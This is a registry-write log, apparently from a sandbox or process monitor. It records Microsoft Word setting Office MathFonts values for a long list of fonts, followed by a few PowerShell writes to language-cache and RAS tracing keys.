HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3040
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661386
3040
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661387
1580
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1580
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
